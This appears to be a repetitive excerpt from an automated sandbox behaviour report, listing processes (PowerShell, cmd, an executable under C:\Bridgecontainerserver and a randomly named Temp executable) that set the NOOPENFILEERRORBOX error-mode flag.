Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
